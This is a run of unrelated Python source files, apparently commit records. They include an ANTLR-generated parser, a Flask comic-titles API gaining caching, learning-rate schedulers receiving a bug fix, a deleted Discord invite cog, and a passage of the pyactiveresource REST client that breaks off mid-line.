self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IntegerLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def INTEGER(self):
return self.getToken(SmallCParser.INTEGER, 0)
def getRuleIndex(self):
return SmallCParser.RULE_integerLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIntegerLiteral" ):
listener.enterIntegerLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIntegerLiteral" ):
listener.exitIntegerLiteral(self)
def integerLiteral(self):
localctx = SmallCParser.IntegerLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 96, self.RULE_integerLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 544
self.match(SmallCParser.INTEGER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CharacterLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CHARACTER(self):
return self.getToken(SmallCParser.CHARACTER, 0)
def getRuleIndex(self):
return SmallCParser.RULE_characterLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCharacterLiteral" ):
listener.enterCharacterLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCharacterLiteral" ):
listener.exitCharacterLiteral(self)
def characterLiteral(self):
localctx = SmallCParser.CharacterLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 98, self.RULE_characterLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 546
self.match(SmallCParser.CHARACTER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class StringLiteralContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def STRING(self):
return self.getToken(SmallCParser.STRING, 0)
def getRuleIndex(self):
return SmallCParser.RULE_stringLiteral
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStringLiteral" ):
listener.enterStringLiteral(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStringLiteral" ):
listener.exitStringLiteral(self)
def stringLiteral(self):
localctx = SmallCParser.StringLiteralContext(self, self._ctx, self.state)
self.enterRule(localctx, 100, self.RULE_stringLiteral)
try:
self.enterOuterAlt(localctx, 1)
self.state = 548
self.match(SmallCParser.STRING)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
if self._predicates == None:
self._predicates = dict()
self._predicates[3] = self.oplevel12_sempred
self._predicates[4] = self.oplevel11_sempred
self._predicates[8] = self.oplevel7_sempred
self._predicates[9] = self.oplevel6_sempred
self._predicates[11] = self.oplevel4_sempred
self._predicates[12] = self.oplevel3_sempred
self._predicates[14] = self.oplevel1_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def oplevel12_sempred(self, localctx:Oplevel12Context, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 2)
def oplevel11_sempred(self, localctx:Oplevel11Context, predIndex:int):
if predIndex == 1:
return self.precpred(self._ctx, 2)
def oplevel7_sempred(self, localctx:Oplevel7Context, predIndex:int):
if predIndex == 2:
return self.precpred(self._ctx, 3)
if predIndex == 3:
return self.precpred(self._ctx, 2)
def oplevel6_sempred(self, localctx:Oplevel6Context, predIndex:int):
if predIndex == 4:
return self.precpred(self._ctx, 5)
if predIndex == 5:
return self.precpred(self._ctx, 4)
if predIndex == 6:
return self.precpred(self._ctx, 3)
if predIndex == 7:
return self.precpred(self._ctx, 2)
def oplevel4_sempred(self, localctx:Oplevel4Context, predIndex:int):
if predIndex == 8:
return self.precpred(self._ctx, 3)
if predIndex == 9:
return self.precpred(self._ctx, 2)
def oplevel3_sempred(self, localctx:Oplevel3Context, predIndex:int):
if predIndex == 10:
return self.precpred(self._ctx, 4)
if predIndex == 11:
return self.precpred(self._ctx, 3)
if predIndex == 12:
return self.precpred(self._ctx, 2)
def oplevel1_sempred(self, localctx:Oplevel1Context, predIndex:int):
if predIndex == 13:
return self.precpred(self._ctx, 9)
if predIndex == 14:
return self.precpred(self._ctx, 8)
if predIndex == 15:
return self.precpred(self._ctx, 7)
|
# -*- coding: utf-8 -*-
"""
longboxed.api.titles
~~~~~~~~~~~~~~~~~~~~
Title endpoints
"""
from datetime import datetime
from flask import current_app, Blueprint, jsonify, request
from sqlalchemy.orm.exc import NoResultFound
from ..helpers import current_wednesday, next_wednesday, after_wednesday
from ..models import Title, Issue, Publisher
from .errors import bad_request
from . import route
bp = Blueprint('titles', __name__, url_prefix='/titles')
@route(bp, '/')
def get_titles():
page = request.args.get('page', 1, type=int)
count = request.args.get('count', 50, type=int)
disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
#pagination = Title.query.order_by(Title.name)\
# .paginate(page, per_page=count, error_out=False)
pagination = Title.query.join(Title.publisher)\
.filter(Publisher.name.notin_(disabled_pubs))\
.order_by(Title.name)\
.paginate(page, per_page=count, error_out=False)
titles = pagination.items
prev = None
if pagination.has_prev:
prev = page-1
next = None
if pagination.has_next:
next = page+1
return jsonify({
'titles': [title.to_json() for title in titles],
'prev': prev,
'next': next,
'total': pagination.total,
'count': count
})
@route(bp, '/<int:id>')
def get_title(id):
title = Title.query.get_or_404(id)
if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
return bad_request('Titles not available from this publisher')
return jsonify({
'title': title.to_json()
})
@route(bp, '/<int:id>/issues/')
def get_issues_for_title(id):
title = Title.query.get_or_404(id)
if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
return bad_request('Titles not available from this publisher')
page = request.args.get('page', 1, type=int)
count = request.args.get('count', 50, type=int)
# Set the maximum date to search for issues (This week or next week)
if after_wednesday(datetime.today().date()):
date = next_wednesday()
else:
date = current_wednesday()
pagination = Issue.query.filter(
Issue.title==title,
Issue.is_parent==True,
Issue.on_sale_date <= date,
Issue.on_sale_date != None)\
.order_by(Issue.on_sale_date.desc())\
.paginate(page, per_page=count, error_out=False)
issues = pagination.items
prev = None
if pagination.has_prev:
prev = page-1
next = None
if pagination.has_next:
next = page+1
return jsonify({
'title': title.name,
'issues': [issue.to_json() for issue in issues],
'prev': prev,
'next': next,
'total': pagination.total,
'count': count
})
@route(bp, '/autocomplete/', methods=['GET'])
def autocomplete():
if 'query' not in request.args.keys():
return bad_request('Must submit a \'query\' parameter!')
disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
fragment = request.args.get('query')
keywords = fragment.split()
searchstring = '%%'.join(keywords)
searchstring = '%%%s%%' % (searchstring)
try:
#res = Title.query.filter(Title.name.ilike(searchstring))\
# .order_by(Title.num_subscribers.desc())\
# .limit(20)\
# .all()
res = Title.query.filter(Title.name.ilike(searchstring))\
.join(Title.publisher)\
.filter(Publisher.name.notin_(disabled_pubs))\
.order_by(Title.num_subscribers.desc())\
.limit(10)\
.all()
return jsonify({
'query': fragment,
'suggestions': [r.to_json() for r in res],
})
except NoResultFound:
return jsonify({'query': fragment, 'suggestions':[]})
added test method to the Title blueprint for testing caching
# -*- coding: utf-8 -*-
"""
longboxed.api.titles
~~~~~~~~~~~~~~~~~~~~
Title endpoints
"""
from datetime import datetime
from flask import current_app, Blueprint, jsonify, request
from sqlalchemy.orm.exc import NoResultFound
from ..core import cache
from ..helpers import (current_wednesday, next_wednesday, after_wednesday,
make_cache_key)
from ..models import Title, Issue, Publisher
from .errors import bad_request
from . import route
bp = Blueprint('titles', __name__, url_prefix='/titles')
@route(bp, '/test/<int:id>')
@cache.cached(timeout=30, key_prefix=make_cache_key)
def test(id):
print 'NOT CACHE'
a = int(request.args.get('a'))
b = int(request.args.get('b'))
return str(a + b + id)
@route(bp, '/')
@cache.cached(timeout=300, key_prefix=make_cache_key)
def get_titles():
print 'NOT CACHE'
page = request.args.get('page', 1, type=int)
count = request.args.get('count', 50, type=int)
disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
#pagination = Title.query.order_by(Title.name)\
# .paginate(page, per_page=count, error_out=False)
pagination = Title.query.join(Title.publisher)\
.filter(Publisher.name.notin_(disabled_pubs))\
.order_by(Title.name)\
.paginate(page, per_page=count, error_out=False)
titles = pagination.items
prev = None
if pagination.has_prev:
prev = page-1
next = None
if pagination.has_next:
next = page+1
return jsonify({
'titles': [title.to_json() for title in titles],
'prev': prev,
'next': next,
'total': pagination.total,
'count': count
})
@route(bp, '/<int:id>')
def get_title(id):
title = Title.query.get_or_404(id)
if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
return bad_request('Titles not available from this publisher')
return jsonify({
'title': title.to_json()
})
@route(bp, '/<int:id>/issues/')
def get_issues_for_title(id):
title = Title.query.get_or_404(id)
if title.publisher.name in current_app.config.get('DISABLED_PUBS', []):
return bad_request('Titles not available from this publisher')
page = request.args.get('page', 1, type=int)
count = request.args.get('count', 50, type=int)
# Set the maximum date to search for issues (This week or next week)
if after_wednesday(datetime.today().date()):
date = next_wednesday()
else:
date = current_wednesday()
pagination = Issue.query.filter(
Issue.title==title,
Issue.is_parent==True,
Issue.on_sale_date <= date,
Issue.on_sale_date != None)\
.order_by(Issue.on_sale_date.desc())\
.paginate(page, per_page=count, error_out=False)
issues = pagination.items
prev = None
if pagination.has_prev:
prev = page-1
next = None
if pagination.has_next:
next = page+1
return jsonify({
'title': title.name,
'issues': [issue.to_json() for issue in issues],
'prev': prev,
'next': next,
'total': pagination.total,
'count': count
})
@route(bp, '/autocomplete/', methods=['GET'])
def autocomplete():
if 'query' not in request.args.keys():
return bad_request('Must submit a \'query\' parameter!')
disabled_pubs = current_app.config.get('DISABLED_PUBS', [])
fragment = request.args.get('query')
keywords = fragment.split()
searchstring = '%%'.join(keywords)
searchstring = '%%%s%%' % (searchstring)
try:
#res = Title.query.filter(Title.name.ilike(searchstring))\
# .order_by(Title.num_subscribers.desc())\
# .limit(20)\
# .all()
res = Title.query.filter(Title.name.ilike(searchstring))\
.join(Title.publisher)\
.filter(Publisher.name.notin_(disabled_pubs))\
.order_by(Title.num_subscribers.desc())\
.limit(10)\
.all()
return jsonify({
'query': fragment,
'suggestions': [r.to_json() for r in res],
})
except NoResultFound:
return jsonify({'query': fragment, 'suggestions':[]})
|
# Copyright 2014 Yajie Miao Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
import cPickle
class LearningRate(object):
def __init__(self):
'''constructor'''
def get_rate(self):
pass
def get_next_rate(self, current_error):
pass
class LearningRateConstant(LearningRate):
def __init__(self, learning_rate = 0.08, epoch_num = 20):
self.learning_rate = learning_rate
self.epoch = 1
self.epoch_num = epoch_num
self.rate = learning_rate
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
if ( self.epoch >= self.epoch_num):
self.rate = 0.0
else:
self.rate = self.learning_rate
self.epoch += 1
return self.rate
class LearningRateExpDecay(LearningRate):
def __init__(self, start_rate = 0.08, scale_by = 0.5,
min_derror_decay_start = 0.05, min_derror_stop = 0.05, init_error = 100,
decay=False, min_epoch_decay_start=15, zero_rate = 0.0):
self.start_rate = start_rate
self.init_error = init_error
self.rate = start_rate
self.scale_by = scale_by
self.min_derror_decay_start = min_derror_decay_start
self.min_derror_stop = min_derror_stop
self.lowest_error = init_error
self.epoch = 1
self.decay = decay
self.zero_rate = zero_rate
self.min_epoch_decay_start = min_epoch_decay_start
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
diff_error = 0.0
diff_error = self.lowest_error - current_error
if (current_error < self.lowest_error):
self.lowest_error = current_error
if (self.decay):
if (diff_error < self.min_derror_stop):
self.rate = 0.0
else:
self.rate *= self.scale_by
else:
if ((diff_error < self.min_derror_decay_start) and (self.epoch > self.min_epoch_decay_start)):
self.decay = True
self.rate *= self.scale_by
self.epoch += 1
return self.rate
class LearningMinLrate(LearningRate):
def __init__(self, start_rate = 0.08, scale_by = 0.5,
min_derror_decay_start = 0.05,
min_lrate_stop = 0.0002, init_error = 100,
decay=False, min_epoch_decay_start=15):
self.start_rate = start_rate
self.init_error = init_error
self.rate = start_rate
self.scale_by = scale_by
self.max_epochs = max_epochs
self.min_lrate_stop = min_lrate_stop
self.lowest_error = init_error
self.min_derror_decay_start = min_derror_decay_start
self.epoch = 1
self.decay = decay
self.min_epoch_decay_start = min_epoch_decay_start
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
diff_error = 0.0
diff_error = self.lowest_error - current_error
if (current_error < self.lowest_error):
self.lowest_error = current_error
if (self.decay):
if (self.rate < self.min_lrate_stop):
self.rate = 0.0
else:
self.rate *= self.scale_by
else:
if (diff_error < self.min_derror_decay_start) and (self.epoch >= self.min_epoch_decay_start):
self.decay = True
self.rate *= self.scale_by
self.epoch += 1
return self.rate
class LearningFixedLrate(LearningRate):
def __init__(self, start_rate = 0.08, scale_by = 0.5,
decay_start_epoch = 10, init_error = 100,
decay=False, stop_after_deday_epoch=6):
self.start_rate = start_rate
self.init_error = init_error
self.rate = start_rate
self.scale_by = scale_by
self.decay_start_epoch = decay_start_epoch
self.stop_after_deday_epoch = stop_after_deday_epoch
self.lowest_error = init_error
self.epoch = 1
self.decay = decay
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
diff_error = 0.0
diff_error = self.lowest_error - current_error
if (current_error < self.lowest_error):
self.lowest_error = current_error
if (self.decay):
if (self.epoch >= self.decay_start_epoch + self.stop_after_deday_epoch):
self.rate = 0.0
else:
self.rate *= self.scale_by
else:
if (self.epoch >= self.decay_start_epoch):
self.decay = True
self.rate *= self.scale_by
self.epoch += 1
return self.rate
# save and load the learning rate class
def _lrate2file(lrate, filename='file.out'):
with open(filename, "wb") as output:
cPickle.dump(lrate, output, cPickle.HIGHEST_PROTOCOL)
def _file2lrate(filename='file.in'):
return cPickle.load(open(filename,'rb'))
# functions to save and resume the learning rate
# the following 4 fields are written into <lrate_file>, each field per line
# lrate.epoch: the current epoch
# lrate.rate: the current learning rate
# lrate.lowest_error: the current lowest learning rate
# lrate.decay: whether decay has started
def save_lrate(lrate, lrate_file):
file_open = open(lrate_file, 'w') # always overwrite
file_open.write(str(lrate.epoch) + '\n')
file_open.write(str(lrate.rate) + '\n')
file_open.write(str(lrate.lowest_error) + '\n')
file_open.write(str(int(lrate.decay)) + '\n')
file_open.close()
def resume_lrate(lrate, lrate_file):
file_open = open(lrate_file, 'r')
line = file_open.readline().replace('\n','')
lrate.epoch = int(line)
line = file_open.readline().replace('\n','')
lrate.rate = float(line)
line = file_open.readline().replace('\n','')
lrate.lowest_error = float(line)
line = file_open.readline().replace('\n','')
lrate.decay = bool(int(line))
file_open.close()
a bug fix in utils/learn_rates.py
# Copyright 2014 Yajie Miao Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
import cPickle
class LearningRate(object):
def __init__(self):
'''constructor'''
def get_rate(self):
pass
def get_next_rate(self, current_error):
pass
class LearningRateConstant(LearningRate):
def __init__(self, learning_rate = 0.08, epoch_num = 20):
self.learning_rate = learning_rate
self.epoch = 1
self.epoch_num = epoch_num
self.rate = learning_rate
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
if ( self.epoch >= self.epoch_num):
self.rate = 0.0
else:
self.rate = self.learning_rate
self.epoch += 1
return self.rate
class LearningRateExpDecay(LearningRate):
def __init__(self, start_rate = 0.08, scale_by = 0.5,
min_derror_decay_start = 0.05, min_derror_stop = 0.05, init_error = 100,
decay=False, min_epoch_decay_start=15, zero_rate = 0.0):
self.start_rate = start_rate
self.init_error = init_error
self.rate = start_rate
self.scale_by = scale_by
self.min_derror_decay_start = min_derror_decay_start
self.min_derror_stop = min_derror_stop
self.lowest_error = init_error
self.epoch = 1
self.decay = decay
self.zero_rate = zero_rate
self.min_epoch_decay_start = min_epoch_decay_start
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
diff_error = 0.0
diff_error = self.lowest_error - current_error
if (current_error < self.lowest_error):
self.lowest_error = current_error
if (self.decay):
if (diff_error < self.min_derror_stop):
self.rate = 0.0
else:
self.rate *= self.scale_by
else:
if ((diff_error < self.min_derror_decay_start) and (self.epoch > self.min_epoch_decay_start)):
self.decay = True
self.rate *= self.scale_by
self.epoch += 1
return self.rate
class LearningMinLrate(LearningRate):
def __init__(self, start_rate = 0.08, scale_by = 0.5,
min_derror_decay_start = 0.05,
min_lrate_stop = 0.0002, init_error = 100,
decay=False, min_epoch_decay_start=15):
self.start_rate = start_rate
self.init_error = init_error
self.rate = start_rate
self.scale_by = scale_by
self.min_lrate_stop = min_lrate_stop
self.lowest_error = init_error
self.min_derror_decay_start = min_derror_decay_start
self.epoch = 1
self.decay = decay
self.min_epoch_decay_start = min_epoch_decay_start
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
diff_error = 0.0
diff_error = self.lowest_error - current_error
if (current_error < self.lowest_error):
self.lowest_error = current_error
if (self.decay):
if (self.rate < self.min_lrate_stop):
self.rate = 0.0
else:
self.rate *= self.scale_by
else:
if (diff_error < self.min_derror_decay_start) and (self.epoch >= self.min_epoch_decay_start):
self.decay = True
self.rate *= self.scale_by
self.epoch += 1
return self.rate
class LearningFixedLrate(LearningRate):
def __init__(self, start_rate = 0.08, scale_by = 0.5,
decay_start_epoch = 10, init_error = 100,
decay=False, stop_after_deday_epoch=6):
self.start_rate = start_rate
self.init_error = init_error
self.rate = start_rate
self.scale_by = scale_by
self.decay_start_epoch = decay_start_epoch
self.stop_after_deday_epoch = stop_after_deday_epoch
self.lowest_error = init_error
self.epoch = 1
self.decay = decay
def get_rate(self):
return self.rate
def get_next_rate(self, current_error):
diff_error = 0.0
diff_error = self.lowest_error - current_error
if (current_error < self.lowest_error):
self.lowest_error = current_error
if (self.decay):
if (self.epoch >= self.decay_start_epoch + self.stop_after_deday_epoch):
self.rate = 0.0
else:
self.rate *= self.scale_by
else:
if (self.epoch >= self.decay_start_epoch):
self.decay = True
self.rate *= self.scale_by
self.epoch += 1
return self.rate
# save and load the learning rate class
def _lrate2file(lrate, filename='file.out'):
with open(filename, "wb") as output:
cPickle.dump(lrate, output, cPickle.HIGHEST_PROTOCOL)
def _file2lrate(filename='file.in'):
return cPickle.load(open(filename,'rb'))
# functions to save and resume the learning rate
# the following 4 fields are written into <lrate_file>, each field per line
# lrate.epoch: the current epoch
# lrate.rate: the current learning rate
# lrate.lowest_error: the current lowest learning rate
# lrate.decay: whether decay has started
def save_lrate(lrate, lrate_file):
file_open = open(lrate_file, 'w') # always overwrite
file_open.write(str(lrate.epoch) + '\n')
file_open.write(str(lrate.rate) + '\n')
file_open.write(str(lrate.lowest_error) + '\n')
file_open.write(str(int(lrate.decay)) + '\n')
file_open.close()
def resume_lrate(lrate, lrate_file):
file_open = open(lrate_file, 'r')
line = file_open.readline().replace('\n','')
lrate.epoch = int(line)
line = file_open.readline().replace('\n','')
lrate.rate = float(line)
line = file_open.readline().replace('\n','')
lrate.lowest_error = float(line)
line = file_open.readline().replace('\n','')
lrate.decay = bool(int(line))
file_open.close()
|
import discord
from discord.ext import commands
from .utils import checks
class Invite:
"""Runs a command in the terminal"""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
@checks.admin_or_permissions(manage_server=True)
async def makeinvite(self, ctx, *, server):
try:
serverobject = discord.utils.get(self.bot.servers, name=server)
invite = await self.bot.create_invite(serverobject, max_age=0)
await self.bot.send_message(ctx.message.author, invite)
except:
await self.bot.say("No server found or invalid permissions")
def setup(bot):
n = Invite(bot)
bot.add_cog(n)
Delete invite.py
|
#!/usr/bin/python2.4
# Authors: Jared Kuolt <me@superjared.com>, Mark Roach <mrroach@google.com>
"""Connect to and interact with a REST server and its objects."""
import new
import re
import sys
import urllib
import urlparse
from string import Template
from pyactiveresource import connection
from pyactiveresource import util
VALID_NAME = re.compile('[a-z_]\w*') # Valid python attribute names
class Error(Exception):
"""A general error derived from Exception."""
pass
class ResourceMeta(type):
"""A metaclass to handle singular/plural attributes."""
def __new__(mcs, name, bases, new_attrs):
"""Create a new class.
Args:
mcs: The metaclass.
name: The name of the class.
bases: List of base classes from which mcs inherits.
new_attrs: The class attribute dictionary.
"""
if '_singular' not in new_attrs or not new_attrs['_singular']:
# Convert CamelCase to lower_underscore
singular = re.sub(r'\B((?<=[a-z])[A-Z]|[A-Z](?=[a-z]))',
r'_\1', name).lower()
new_attrs['_singular'] = singular
if '_plural' not in new_attrs or not new_attrs['_plural']:
new_attrs['_plural'] = util.pluralize(new_attrs['_singular'])
klass = type.__new__(mcs, name, bases, new_attrs)
return klass
class ClassAndInstanceMethod(object):
"""A descriptor which allows class/instance methods to have the same name."""
def __init__(self, class_method, instance_method):
self.class_method = class_method
self.instance_method = instance_method
def __get__(self, instance, owner):
if instance:
return getattr(instance, self.instance_method)
return getattr(owner, self.class_method)
class ActiveResource(object):
"""Represents an activeresource object."""
__metaclass__ = ResourceMeta
_site = ''
_user = ''
_password = ''
_connection_obj = None
_headers = None
_timeout = 5
def __init__(self, attributes, prefix_options=None):
"""Initialize a new ActiveResource object.
Args:
attributes: A dictionary of attributes which represent this object.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
"""
self.attributes = {}
if prefix_options:
self._prefix_options = prefix_options
else:
self._prefix_options = {}
self._update(attributes)
self._initialized = True
# Public class methods which act as factory functions
@classmethod
def find(cls, id_=None, from_=None, **kwargs):
"""Core method for finding resources.
Args:
id_: A specific resource to retrieve.
from_: The path that resources will be fetched from.
kwargs: any keyword arguments for query.
Returns:
An ActiveResource object.
Raises:
connection.Error: On any communications errors.
Error: On any other errors.
"""
if id_:
return cls._find_single(id_, **kwargs)
return cls._find_every(from_=from_, **kwargs)
@classmethod
def find_one(cls, from_, **kwargs):
"""Get a single resource from a specific URL.
Args:
from_: The path that resources will be fetched from.
kwargs: Any keyword arguments for query.
Returns:
An ActiveResource object.
Raises:
connection.Error: On any communications errors.
Error: On any other errors.
"""
return cls._find_one(from_, kwargs)
@classmethod
def exists(cls, id_, **kwargs):
"""Check whether a resource exists.
Args:
id_: The id or other key which specifies a unique object.
kwargs: Any keyword arguments for query.
Returns:
True if the resource is found, False otherwise.
"""
prefix_options, query_options = cls._split_options(kwargs)
path = cls._element_path(id_, prefix_options, query_options)
try:
_ = cls._connection().head(path, cls._headers)
return True
except connection.Error:
return False
# Non-public class methods to support the above
@classmethod
def _split_options(cls, options):
"""Split prefix options and query options.
Args:
options: A dictionary of prefix and/or query options.
Returns:
A tuple containing (prefix_options, query_options)
"""
#TODO(mrroach): figure out prefix_options
prefix_options = {}
query_options = {}
for key, value in options.items():
if key in cls._prefix_parameters():
prefix_options[key] = value
else:
query_options[key] = value
return [prefix_options, query_options]
@classmethod
def _find_single(cls, id_, **kwargs):
"""Get a single object from the default URL.
Args:
id_: The id or other key which specifies a unique object.
kwargs: Any keyword arguments for the query.
Returns:
An ActiveResource object.
Raises:
ConnectionError: On any error condition.
"""
prefix_options, query_options = cls._split_options(kwargs)
path = cls._element_path(id_, prefix_options, query_options)
return cls._build_object(cls._connection().get(path, cls._headers),
prefix_options)
@classmethod
def _find_one(cls, from_, query_options):
"""Find a single resource from a one-off URL.
Args:
from_: The path from which to retrieve the resource.
query_options: Any keyword arguments for the query.
Returns:
An ActiveResource object.
Raises:
connection.ConnectionError: On any error condition.
"""
#TODO(mrroach): allow from_ to be a string-generating function
path = from_ + cls._query_string(query_options)
return cls._build_object(cls._connection().get(path, cls._headers))
@classmethod
def _find_every(cls, from_=None, **kwargs):
"""Get all resources.
Args:
from_: (optional) The path from which to retrieve the resource.
kwargs: Any keyword arguments for the query.
Returns:
A list of resources.
"""
if from_:
path = from_ + cls._query_string(kwargs)
prefix_options = None
else:
prefix_options, query_options = cls._split_options(kwargs)
path = cls._collection_path(prefix_options, query_options)
return cls._build_list(cls._connection().get(path, cls._headers),
prefix_options)
@classmethod
def _build_object(cls, xml, prefix_options=None):
"""Create an object or objects for the given xml string.
Args:
xml: An xml string containing the object definition.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
Returns:
An ActiveResource object.
"""
element_type, attributes = util.xml_to_dict(
xml, saveroot=True).items()[0]
return cls(attributes, prefix_options)
@classmethod
def _build_list(cls, xml, prefix_options=None):
"""Create a list of objects for the given xml string.
Args:
xml: An xml string containing multiple object definitions.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
Returns:
A list of ActiveResource objects.
"""
resources = []
collection_type, elements = util.xml_to_dict(
xml, saveroot=True).items()[0]
for element in elements:
resources.append(cls(element, prefix_options))
return resources
@classmethod
def _query_string(cls, query_options):
"""Return a query string for the given options.
Args:
query_options: A dictionary of query keys/values.
Returns:
A string containing the encoded query.
"""
if query_options:
return '?' + urllib.urlencode(query_options)
else:
return ''
@classmethod
def _element_path(cls, id_, prefix_options=None, query_options=None):
"""Get the element path for the given id.
Examples:
Comment.element_path(1, {'post_id': 5}) -> /posts/5/act
Args:
id_: The id of the object to retrieve.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
query_options: A dict of items to add to the query string for
the request.
Returns:
The path (relative to site) to the element formatted with the query.
"""
return '%(prefix)s/%(plural)s/%(id)s.%(format)s%(query)s' % {
'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'id': id_,
'format': 'xml',
'query': cls._query_string(query_options)}
@classmethod
def _collection_path(cls, prefix_options=None, query_options=None):
"""Get the collection path for this object type.
Examples:
Comment.collection_path() -> /comments.xml
Comment.collection_path(query_options={'active': 1})
-> /comments.xml?active=1
Comment.collection_path({'posts': 5})
-> /posts/5/comments.xml
Args:
prefix_options: A dict of prefixes to add to the request for
nested URLs
query_options: A dict of items to add to the query string for
the request.
Returns:
The path (relative to site) to this type of collection.
"""
return '%(prefix)s/%(plural)s.%(format)s%(query)s' % {
'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'format': 'xml',
'query': cls._query_string(query_options)}
@classmethod
def _custom_method_collection_url(cls, method_name, options):
prefix_options, query_options = cls._split_options(options)
path = (
'%(prefix)s/%(plural)s/%(method_name)s.%(format)s%(query)s' %
{'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'method_name': method_name,
'format': 'xml',
'query': cls._query_string(query_options)})
return path
@classmethod
def _class_get(cls, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return util.xml_to_dict(cls._connection().get(url, cls._headers))
@classmethod
def _class_post(cls, method_name, body='', **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().post(url, cls._headers, body)
@classmethod
def _class_put(cls, method_name, body='', **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().put(url, cls._headers, body)
@classmethod
def _class_delete(cls, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().delete(url, cls._headers)
@classmethod
def _prefix_parameters(cls):
"""Return a list of the parameters used in the site prefix.
e.g. /objects/$object_id would yield ['object_id']
/objects/${object_id}/people/$person_id/ would yield
['object_id', 'person_id']
Args:
None
Returns:
A set of named parameters.
"""
path = urlparse.urlsplit(cls._site)[2]
template = Template(path)
keys = set()
for match in template.pattern.finditer(path):
for match_type in 'braced', 'named':
if match.groupdict()[match_type]:
keys.add(match.groupdict()[match_type])
return keys
@classmethod
def _prefix(cls, options=None):
"""Return the prefix for this object type.
Args:
options: A dictionary containing additional prefixes to prepend.
Returns:
A string containing the path to this element.
"""
path = re.sub('/$', '', urlparse.urlsplit(cls._site)[2])
template = Template(path)
keys = cls._prefix_parameters()
options = dict([(k, options.get(k, '')) for k in keys])
return template.safe_substitute(options)
@classmethod
def _connection(cls):
"""Return a connection object which handles HTTP requests."""
if not cls._connection_obj:
cls._connection_obj = connection.Connection(
